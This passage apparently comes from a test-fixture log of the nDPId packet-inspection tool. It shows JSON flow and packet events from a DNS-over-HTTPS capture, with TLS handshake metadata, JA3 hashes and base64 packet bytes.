{"version":"TLSv1.3","client_requested_server_name":"dnsnl.alekberg.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00657{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":156,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":946739311734,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":198,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":198,"pkt_l4_len":164,"thread_ts_msec":946739311734,"pkt":"ZmZmZmZmRERERERECABFAAC4X8lAADUGdNszD3zQCgAAAQG7zKKGPlTtvqP5CFAYAIMEyQAAeS0tOv0CsE56CKvTlOFyTsi\/xDWjEiSHZ06cNkY05jGBZ0BY+\/8ar9VauCfvuAhmfbkHRsufSt9+BCdWOZTLG2pLv7Rqy1KMbXDj1dE3FFg5TtH6GqR+kavc+JEGFEgehaZ\/FbuVi\/sk8mhzGqOKXx4crPRKN7mN3k61duL6EtdmqASfaRcWFkjwmH\/5s907"} +00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":171,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312203,"flow_last_seen":946739312203,"flow_idle_time":7560000,"flow_min_l4_payload_len":284,"flow_max_l4_payload_len":284,"flow_tot_l4_payload_len":284,"flow_avg_l4_payload_len":284,"midstream":1,"thread_ts_msec":946739312203,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"116.203.179.248","src_port":41720,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00842{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":171,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":946739312203,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":338,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":338,"pkt_l4_len":304,"thread_ts_msec":946739312203,"pkt":"REREREREZmZmZmZmCABFAAFEaI9AAL0GaqQKAAABdMuz+KL4AbtonCHmRxNJVFAYAfbqtgAAFgMBARcBAAETAwNLJ0LoKZs0jG4db6SH737y8naHXDM3S+mAdGRoYzSPaSD3zYs+eWXICfX4e3zLCPsIhyJf4YitXdBLrNgVR3LKFwAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACkAAAAEwARAAAOcnVtcGVsc2VwcC5vcmcABQAFAQAAAAAACgAKAAgAHQAXABgAGQALAAIBAAANABoAGAgEBAMIBwgFCAYEAQUBBgEFAwYDAgECA\/8BAAEAABAADgAMAmgyCGh0dHAvMS4xABIAAAArAAkIAwQDAwMCAwEAMwAmACQAHQAg33Waic8Yfh0yJ5buIXWM7xt29S4VxDeDA2qvuzRytkE="} +00908{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":171,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312203,"flow_last_seen":946739312203,"flow_idle_time":7560000,"flow_min_l4_payload_len":284,"flow_max_l4_payload_len":284,"flow_tot_l4_payload_len":284,"flow_avg_l4_payload_len":284,"midstream":1,"thread_ts_msec":946739312203,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"116.203.179.248","src_port":41720,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"rumpelsepp.org","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+02422{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":172,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":946739312226,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1506,"pkt_l4_len":1472,"thread_ts_msec":946739312226,"pkt":"ZmZmZmZmRERERERECABFAAXUJ6JAADYGLgJ0y7P4CgAAAQG7ovhHE0lUaJwjAlAQAfWSIAAAFgMDAHoCAAB2AwPlxRfYXMEhZdQ8ajfb6CRVs1xCMiaZqVFxrCKnBSpfMSD3zYs+eWXICfX4e3zLCPsIhyJf4YitXdBLrNgVR3LKFxMBAAAuACsAAgMEADMAJAAdACC7U5tcN1lyGmU4zwJoCO50vCXYPM\/QvTMxioFdnZMwahQDAwABARcDAwAgWYRxXowUwkrzaVinqnzWcQ+TBbMUOwCXts50ql211fAXAwMLXdNQugGPXsJ\/8C6qtHlVybUGs7I40LMTA5OhGA+5YDHeNrEuEhv+tu5lin4eHBImQq4kbeHEAo3aNZo3KmURuDQDW8qwTnUEVfBOev0Cp\/PjSdjbD78ol0y5nY2oRm2fbsKHJzJSSjb0AciAo1LrQOgCF2CvMV+eyOyHUYct\/0CZzYMkLxKZwgRjyAJuXMfA4yEKZGM2df01\/BUbSo1Rl+1vGFFUkgKmIgKkRy+Bl\/5\/aUS0H7x+NZdUl10aLbTaEzyxHvC5FKjKyKio8Nq1FnOONx6t6a1NxwFwus79kTDzOhi2RBBAptjB5bREXvI7I78ofmPnYWckOqrJFFwvKuiJMXscIR8meUqP2LfgWzMDMhsH4p0jN+l3Gq+FBdoxKNoG26O484i0pfOfynG5VCfFmeEmq9XB2jrTV2FwEB1w6FHC1GMZVEK60qV4O+pPgrZRJMZSzwllOfjef8V42EZAcff6ioa4KXyU2Lg36HO0yhYzbeNUU3pAi5\/qwo\/8uuPNfVbKx0eipCjwx5+0hZa74DG\/pD0GzntSqS7YWEdlhEup1mtZmQo0eaDjwGNrCt+ZhJgQy3V2hPBCa6ygW9VMF25ycsILPfVx1AuqPxUOHW4j094S0MBQegEN0J3yWeWaiiBlzmaP9zyQI2IatrzAzhNsYChDHK+csfeO9ThoioAfgwS3AljMljsUX8LckrIXpurphG9MTttyGcbyuYOZgMBCh0hvfGempBEWQ87aRGnYict7DJMJ4ANT6I8mIRYfs9ktyEUtlVvr4PQNKARgob1jc7dcCzVhF1wheYyQGYeS88ndMehrocaatcfPAW+sGsd\/PlwCwZjCKZRZc+RY8UIBMVVQFkJfKmd3vMc6ZdNW+eECwipaKd\/GGSBQQLLSZMZlc2\/fq5kgX+ANS93WhwsRG1d13Nrw0y\/ATREqmOdYnxg9NReWvH6Y9oKaWK0ORmDf6ge12lS9oVHWz42D+xzkGejOSsWciqHXAH+yg6krTEDYRK\/FPbGud1EfOntNRDB8fuTqg6A3gnOVkf5Fe+6Udnrmytaz7VKwjYRLdi7vz2qagJMVcAAVeEuovh5FOb\/1EXijxsxUB7j\/jcKgZC3AwFJv0DQSdWi57X+9030WJdNzGWfONsJDey166z5gtgIr0gWE3XSAHs3+JszFzgP3FC9xVilACKjY2RhRQyvT6fGwve0GSnMhLdXxdeZ6r4BSk1XrmYwxLzeXAWqaNfsfk0zirnPcN6UG26k3lnJ6hvodPS8WtfbDlmo8y38gK
+0yMKaENYnpsWQ48t8ZDpKCeCokx5kJ4EaYicnC8gtp5emEtPLOmyhRS\/Kx67Xu26y0PrFyj7Ld8XnP+XpwQqAHuqyPPLcA7ULfoMWkppyHnn9L21Mz+6Ml1h7gnl\/ZwxToT4wqDJUExA47\/9+7Gr\/oh5kj8z6qG0LWqBHYWfEqQZ9C6c64n2xAiBIjVtW2HmMJDocq5nLsWLSEY96ngephvH\/r2i4gA320QycCOlUbe7IShXjhfHajvNFk9aT9mVr+xKfGAIJr4upUShXmjRDRgxjZ9A2ryxbqx35tiU7DJrZpjO\/5DMzEBxvVggb2jlqmTLhZH4TtJi6zfeCLrUu+11tfn0GJzj4HRmOyvzdz8MwTSgWBVisogZKhAqzzkq5ai5YnEcmNOW52YkN74XGWlccUSq2JFZXF"} +00949{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":172,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739312203,"flow_last_seen":946739312226,"flow_idle_time":7560000,"flow_min_l4_payload_len":284,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":1736,"flow_avg_l4_payload_len":868,"midstream":1,"thread_ts_msec":946739312226,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"116.203.179.248","src_port":41720,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"rumpelsepp.org","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+02434{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":173,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":946739312226,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1506,"pkt_l4_len":1472,"thread_ts_msec":946739312226,"pkt":"ZmZmZmZmRERERERECABFAAXUJ6NAADYGLgF0y7P4CgAAAQG7ovhHE08AaJwjAlAYAfWhygAAp6lKTcn83BQxpQ2W+POQkJxpRZXfacCT49dCzRTmvnt7\/eMDX1qsnmxcn8IW\/\/jaiVs0n6JrCEPqM3KpB310Ezncm8MGw7ZSfjBA5NhRsYZd6g\/lnjS76Li5236Ye\/OssNOz\/mjZ3Pxtb9lckb\/iUUI\/CTV\/O+8693wmOcz\/ttlVvcsf2F2cDnHv69Z9ZcBThvWSK1Fyp8msppNqA2rjumUxHY0NG8Y6Cz7YUFXsrxgVnCyIlXLFSqfPySagEMAo+BwG8r0qoeYlZ+taxtjBF+CPFNBs5wvSzuudNsLZAlsoLeVbC7V4nVAvK0ZozwjUaQXydZ7If0bf1gWwEwbOWvwXqAGoH05iR0Faj+nrSPK0l15jvP1ksCKE\/mIp4VHggNWOkJSAoQLhJ7eDNcolNe3VlYAesuTAoWHjzA4h2mXXEBGcexNswvAECexp5rG8zj4HDx39qgDVWk3o0eoSeBD1Uedt57E3iKOheQuYjuGPkNLW\/CT1EKc1xsQFJaPuXeJntSsuTJIbn\/JmjGMrhs2EpgTuc4i6KbgNr+Dg8naPJNChEcAoURckVZ0QP1tlwwQ3au79pUNst+WdCcPkSU8h2p+dgHNltfLpGpzxtjAkiMDwJHlE7uKJfM3Jooj+j8pbChIDWDckUBPBe4tCMPlI9VbP7p8jHCN+Jbgx\/vlzb\/jhrZ3VmwNp1ed4spIYgJkRtqvwQ8Z+wh5eYA\/rsAfAyJTWCHM70B9AefRgCTo9QDWJRLYx1cy2\/Boia47DDoYb3uBS7QfII4eh4Kp0F4K7dkOLwQWThipleT\/tvJB91q4YO69guoqAikyr2u0R4I\/dsfO61jRS\/0OGcoHRfzyYT6Gw0389lH9EFy84qx0Src85OaD1tRwt6pfR9awywt5CBZe04hE0tSwRbw55PNLODVlESQS0e66OA\/M16o1ABO7aMZrc1JmwD6a7e6weEeFmAazedN8hZmlYv1tms5VSBekoNgGF0CPdRNH7+BWQQ\/oy6wbYcn9T8DbY3EESV3ngHV5p7hWwxUALrbhEOn\/rgSRIuWBulfZWiwjpGLHCmd25Lp9PvWu2ARh3jmQWx3LqaLBWQZ2RO9BztLQCxX\/fKF1FJ2Nxx5CvAx1deQyJI3ILd0FX\/RREt+JafDB83Cz6gQe6DiXexfTUxaiReu6RStMeEaz6P71JkxtuCl0MQOV+trcnTBAsrOiC0Pnp41ddFZ9LyjPw5Mwgkq5S8GDPbsUHU26OG2nr4C2Qc8pral7heokrRYgBHlPnskyAlkCxuL+0XPLYLPIRRcJ64nRekoDw2yg6gDPsz4RcMVRLhEiIfkrCTlBJmmDuRqLpZJpecdlBmRfFHNMXGB8i+H\/\/tNPFLdJAZryXO\/8h5nkH4Mq7yLQ6vkIR62sgbVPD0Qe836LfCEQO\/hxA9iWtbqSJ07ScNvoG2Czrtvhfwq400gs5KtFeBbk1AFnMyczsxPdl6tp142MbR3VLQmj78nlxilK51hORc
VLi9ktXxGEonuDfod4vDjaA3pJ\/0ADkZjstpvA2GHymd+GbXXXQzsOxrlPNaHDKM7gA5XeYsGBeDXesqay1VJZXsBwjzKmLHBEfMmuTQkRGywy3RBFrIumMzi24aTghRx9FA\/ZPDZtgNyArr3TSzkQB\/WYB0FDxqBDH7pfBnH8cJXOSx4GfComMuGBhw8lB8S7RS+Tun6aoozaQ7NOXFkWLUNwlMATJg\/u88xBUir9H293nJp613ia6G8KaLtsNZhb97810Q6p5rpfzJ8sEbxPvnOBsJoN2uNaptS39DLNaJ78nP1N\/6JenLJUIebOzoNXR4wfNgVp5Coyyjw8dfCFDyuNA5Oi18AcVmGaGj7TK82vR9gQ2IWuTm0sTMl0T1RNelk87ZLC7oqgqi01091WCo6H3\/T5HgzDHHgrz3hvSk8s9"} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":191,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317842,"flow_last_seen":946739317842,"flow_idle_time":7560000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":946739317842,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":60026,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00843{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":191,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":946739317842,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":337,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":337,"pkt_l4_len":303,"thread_ts_msec":946739317842,"pkt":"REREREREZmZmZmZmCABFAAFDy\/NAAL0GDsoKAAABwx5eHOp6AbvJsoUZMUH8QlAYAfbjLAAAFgMBARYBAAESAwOCYT7eCU1xUXbhTPV2JlKPIHcY7sPH2WwKtpwnSeF8xyAex0Qk69Rnwb5oftgvyqN3KWFf9IzenmheX1LYHsKC9AAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACjAAAAEgAQAAANZG9oLmZmbXVjLm5ldAAFAAUBAAAAAAAKAAoACAAdABcAGAAZAAsAAgEAAA0AGgAYCAQEAwgHCAUIBgQBBQEGAQUDBgMCAQID\/wEAAQAAEAAOAAwCaDIIaHR0cC8xLjEAEgAAACsACQgDBAMDAwIDAQAzACYAJAAdACAw+TAbBBMqcOYtJZmoA1qcBE16Yt0ym3XOBLcMkrVpDQ=="} 
+00904{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":191,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317842,"flow_last_seen":946739317842,"flow_idle_time":7560000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":946739317842,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":60026,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"doh.ffmuc.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +04399{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":192,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":946739317868,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":2958,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2958,"pkt_l4_len":2924,"thread_ts_msec":946739317868,"pkt":"ZmZmZmZmRERERERECABFAAuAyWFAADgGjB\/DHl4cCgAAAQG76noxQfxCybKGNFAQAfXtaQAAFgMDAHoCAAB2AwNkyl8ogzMlAhTUQA2TsMh7Q0Cc2\/3wZHCiwad1Z9NoaCAex0Qk69Rnwb5oftgvyqN3KWFf9IzenmheX1LYHsKC9BMCAAAuACsAAgMEADMAJAAdACD+8H0HbVGEEmZC5hZLdNizcuC\/0pRP3fgeIP4D\/GwhdRQDAwABARcDAwAkfwnuX6wEOZOBUTjar1eVwNX\/5E0Ocx7Di9qIEnerial2sCiHFwMDDDWV4W2nvLW+\/N2l4x6sJgc8wiYdu5HOhM21Gm3mnFcxKO2Ie6ZC8TBNY2Mpp7Yb5rcL6bqv3cZKl4w3lzpNGDKGTjZnaTdTckz2Zj9T\/bsrBq0FYycXELwNiLo2fX1zTKtRPyLUu0GGauan4AQwcaDjRQzNlNJGd6461bdar1412MhrLksAOF3Zz32PJXTXtFU1mwvYVqphcZDb4pPZ0N+gjj7dNR4S3YwPGEbwlcx1UcGfiv3pyH+UUZNMH5Baw9z+5KY9RTPE3Rfw1bhKsm9xadHFb6suVuYDZzfowFS+\/J7rFZVNyczZA\/78zcdYuuXbTxeDjPhOqxAoQDX7VF1HojbcFFzFMGuyikHPdDYckD+WeR5lbhzc\/I
Dh75MNMf\/KMikRmHFGsWSPgCfnHcJinGKvxJJW58RraOB\/5irkT41Kj2mTP7rHD5SNd2CjxOxspgfL21g9EgRySSvXC+1MOm1qzwLgfjx1ZGRqf62CTxE1WBGLSGVSBUD0U9VUbvm7X5SNczaQPf0VLn8L3p7i1Ks07MNKvx2UZUXfrd\/RU2JWlAdhuGfs4RK7IYupZ9gwETRs4hxHaE\/JmiH23lQ8LvM6OtMsbQ6PirB\/Qq+igXuyD0TY3sAc4gdxm+SJGHsDpdSKgD9SodG\/vExsIGp+Gl5tevJKVwUT0pGU9EjX1Bi1e0B1xZ5ye5cjD8jxqC6fGWDYbc0qUQnT6Ei3AwoDVwqGAF6EPjjKHUKSNJDHKDRweWDMJ8eQeivUqlu+lhWhCAE9lUvj8qFKlloewows6Y7yqVUmSPPw60JQ\/7KRplxJ3xUWU3++WylOr+8YCwNo64NgMLldroBbTf3wwNL5K2B8K2fa0ar2Xxz3JO0bcvkksssiMRLPicETirp6CaB0jh\/JBv+EtfNF9XlRRV3bVxTCpp5g2WrRk6UQuYXfLZgXXpvWsW3UQwQvcMLuqGRqk0Lrq45fax67cEa4ablkdoldX6BJdVjUPEVJmY\/4EAB6c5ffE2gmcKP798gpjRuEOsJHx7lU8XAha86w59XzXonwVhFiFEiku0\/ryBztip397enoLu3d\/DdWuO13MC2xztCFDC63o+OIx4LKccR2dUluAwyjMQHJH2QfKyLnH3gJwChS1jbNN6JjmBlIjJ5F5oE0c\/LLe7ZNRcNl04\/gPLP3X4Ig1u++FkuVZR4VffxYIDiKTeCsRjSq8xT0sFQrVMRqRExsxUpTFlLjgmk+4A5gz+AWsHQgXQDHpc8q+tpaaLw2T\/VxrMhaAlTNwD0R+fPu6xqKcmZ7K4tPJ18rUG2cCEq2Vyx\/nZ5Bsb4X51YWHYwI\/b62OL85Ky892\/YpuTiyCwr\/n7zKZjbYHc3bE3kJITVYYhhm7SCsQwZLdboBPXK1hc5zPXoZ51+dKsAS5jlTrL7t90UaX+3d5RBjR5yWI+hwkpRHZC4YPu4wFBj9CS+kKkAjOdshMO3DBnfsoKT51IiDooH56PULR9jXPjPvXwHziEAOD5lKZLhl\/1PpgUaU+m0Qhb9DGdPkvd5L5MtmeN6AG3ojp00pWioyce1OEa+lwCX86DDB4V50XA8WSmUf8Ruv9dDKOkEto48W94o6jbWCBaVHLa30AI1sBDsLlVma26j5oIbiMjlGK8ArsP5ukW3ec2Ucyyw4OeOhYe4PTq7O8QJdyRJffrasJ10uS+VJlhZE6nntiGTZcHenBLx6mVY\/sNy\/xKxBzOkMpSKdjL8GC01HDHp6JDU\/ZHpm00Le70fm6tFZ9vCb5wPUsyYycjMTWmiSgMdLOaewpU9tlODZTwi8DEVWJyEa6fkCFWYdu3u0ydeu8NzIOlQcZ1lyy\/E5qNM0pqUIMKgu+I5sA\/1d+JmmvGoRZQYTQTUa3kxoSS7rPzyV28dHyfYsyZ6xH4xX0Te4M4ymNWY+c\/L9THfsDN\/oVSD593mlv7UAAlNYa3xzFv8UKd\/o0wqF1apADEX5sol\/96BK9yt++kADu5RkL3Q9suLz5lPpANm2QRRIs8Ow+4yzU\/7qCzwe3wQndBdO2mvPNrxNQWX0RWtNADT1hADdzQX8UO24dOXh4qk+iHH6bl8lfIvW8+qqcF2nRbvY6bMLSrGQokwAzcMtwiZdjIJEsFZPEIqPD7EZnzjfnQijrIF9Wn4vbTwPzBnADd1msbtKeSaVNdMJih6KLod12TaeDOeCDRiB61IfXV9dgIKfGFyMlxjk0+d6Grs+cJ7UQzYlQ0mX0vg3on5LNDK23JzvxJlO9RApmtXu0TOUl67cxwpSzAdhxbWvI8l0V4Ai4I3tdYPelpVFVsSo+cgXM3bWISOOqQjzDzqnRV3rpFOpKmYj18yo6
Iw3eQgPQrdVloO5tfEf2RUtUbOK+ineibqkTHcOjvhuseYK31qZJs+iTw0+voLfLVtqWLppBhUR5ajc3xYiWsGOK3UP0Zb+9tGTDp7eUX5mpFIs5TGNFA+qxq204tT5KujsIYtCIDdSXn6JYPAXRTlwA4oEjKa3OoGb33tMMT9hVxCQHDLFOs45v41USfRH5jGOfkuc9t77jPR84y7jSr8tXiXsE5CuwKv3P7uF9BVlABkx3ZlxEIz4\/1UR7mzFGAx9K\/RIDlF6SxU6mh73+mMXE0JVkoSTGdIPiDILMtKbfWz72\/UvSW7dTt35fwXmnQwL7He\/RlLL0\/sjJ8vBxcVsv7+Y0XxXaeqzhRtNiCnRgUcTqfLUOJS8aBbh4HPdSKkdltzZb\/S5Lper3Z8zxxuZkIif3ZJ\/gz\/T0iQbX6Et9RMROBoUHjPg5pKYqkENDxoMG\/MC0WVGiX5R06OFe3s9dZ\/ozvLZvYcEZE7N7F5n9sPRwd+I+59lPh72uicIxFdChXuEOxCFU0V3rGzpol1Y\/VsMpTxsDCKvlfGj6qXugNMGkxmq51kciXtj75pUlzwIMe6kQUn2jTFnukdp6OPxrp0T4\/lDiC3VaK0fB4xi6LdOz\/EwCzEu7lICtRLOOwfKoiPsMnC\/K4Myo47r7qgooc6Dyct7xyGHbGYJon8e+PQMECksrlAXwIcA8LQoEysxirtgk51VSp5RdhUCampTO83NLVIjW6\/5AUld9ViiwVRqzLBg7wtcqkBPZd3uqzxG5sC5MeKaDzMg3QKygjiklub6zdiCWJK8V5PVpgiHBa0as\/kw\/NbzRIp8\/DH7U1o9eDK98CHzu8jiLgQ5n1w2IYkMJA1JpBIvlpsoUz6Qe08g4O6AzxZi5RyC6\/8K7\/Ed0NrDjr+G1S6iNZ+qijE4QRaBke9Co9IWob47jnSAaxgFwziKOB2hnQn493UlWhwDwQZuENq4DusUKLl4gaZTo1LvBrcu9EW+pZ0sdlBNW+e5bo09BfXSYhwTQVczSoVWspRueOrFVGx29DRpvDMWXSToev+\/5dhguN8sE7\/6r6UStt1tBEq6JkIdV7o\/cGVmADZ9PpG+uKpSV95fJQxwhEgMidjt9Nuj7TkbtLKuomHY1OGt2HlKFszmF624Ixr0UPZ7oS0P3i\/BbBVqEJdJZsiVw4MhJvqQMjH63aJ9Ie4EL24xwrBjLm1YPTGhWjPxzGPCBhmgSj9u3DHYv7ANgf\/CwtQN4PY6wBmanZg8AFnKkxZzdFSDH5pdfVl85gHQh72n"} +00946{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":192,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739317842,"flow_last_seen":946739317868,"flow_idle_time":7560000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":3187,"flow_avg_l4_payload_len":1593,"midstream":1,"thread_ts_msec":946739317868,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":60026,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": 
{"version":"TLSv1.3","client_requested_server_name":"doh.ffmuc.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":193,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":946739317869,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":814,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":814,"pkt_l4_len":780,"thread_ts_msec":946739317869,"pkt":"ZmZmZmZmRERERERECABFAAMgyWNAADgGlH3DHl4cCgAAAQG76noxQgeaybKGNFAYAfV6GQAACB\/j9FRzrXDeV1gMTvdtnDbaxVBoJBh9cy8pOcYrD8iqnoIgGbCFSCgUCuevEmCLqMD6ndxwNBjeWxvehtGcTzYfxO5MsUhftQ0+dqR1WhFRhDtmvuIG3Q\/1JnJ+iTTGKy7+d19ANVD5kJS2Kbw1kq1CCeKCETSjOhUhw85xD38cYnUuHGOyMgN3a57KOUyOmb4EwXoByM8BsVlxu1vc1oPozugCeie0GDWpbdeaEmjgROEgR6DsCHE32e8OUOXMw3\/fTV5lRZlHvoE+WIdAJO23JksMoSbzH5lXNpwBfPg5fllHB2gzZy73MltgSTbtU05NdkOcr1ZFoqdQ2V7wBDgCUult1m1frKnm9RbG5so0kMdI1K2imdVR2omx+E2ZIA0aLFwNHZ87uVzv\/27AUYdBTlcNoD9yJPyo52+VSIEhFJ+iC6HMt6T8vMgHE9t8doC6zzQ5PPfhV0Y\/wHOciEZ1QCJawdjeaWA1oK+LH3dEkeN+2N6ZvT6aGJRirsBAqqpY1jcHkYSWOu0YNfkmmhcDAwEZhRt19HF8btCDpTYJhT082yjULJw4KauCEpxSogJCDv0wIm\/nxsgKWJ5swMbqyuXpT7mdSSff3VOjrgPc6f4pSWMC0gPkidij6lKAHSShm5G9hfxPyAE5LFfSUSjOyv6KeU3qvvH\/y9kOCN3ZJI34MmNCSHjx7F7SwgBhT+XBQWcGdTlLW08ufWjBpFEV0wweQ+sorOCpyYk1BQhN7aPpwW+8cPmzhDQyCikmnIgsWh1OdzHEfXqnhQmoNEJoF7iPcZZ2Q5XdXc7TB5Nr97MOlFTANPGwh+Z0IQ0oeyTOBC76R3rCyPcgQuUbw2ZmngRvKZCro22Tf+lTL3RL8Wypoy8hNNZMukYZOxZV3pu1hHfTdtt5At2T9yMXAwMARRSoalzVajpzS8ANj2fKvjjGfm\/L7CaKj2s8TbmN14sqePDJ6R8MH8TM+nnzmnQKkuZgpCVkmHfyoZtoN5aVAw1RpWQU5w=="} 
+00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":222,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739336955,"flow_last_seen":946739336955,"flow_idle_time":7560000,"flow_min_l4_payload_len":284,"flow_max_l4_payload_len":284,"flow_tot_l4_payload_len":284,"flow_avg_l4_payload_len":284,"midstream":1,"thread_ts_msec":946739336955,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.233.106.232","src_port":46658,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 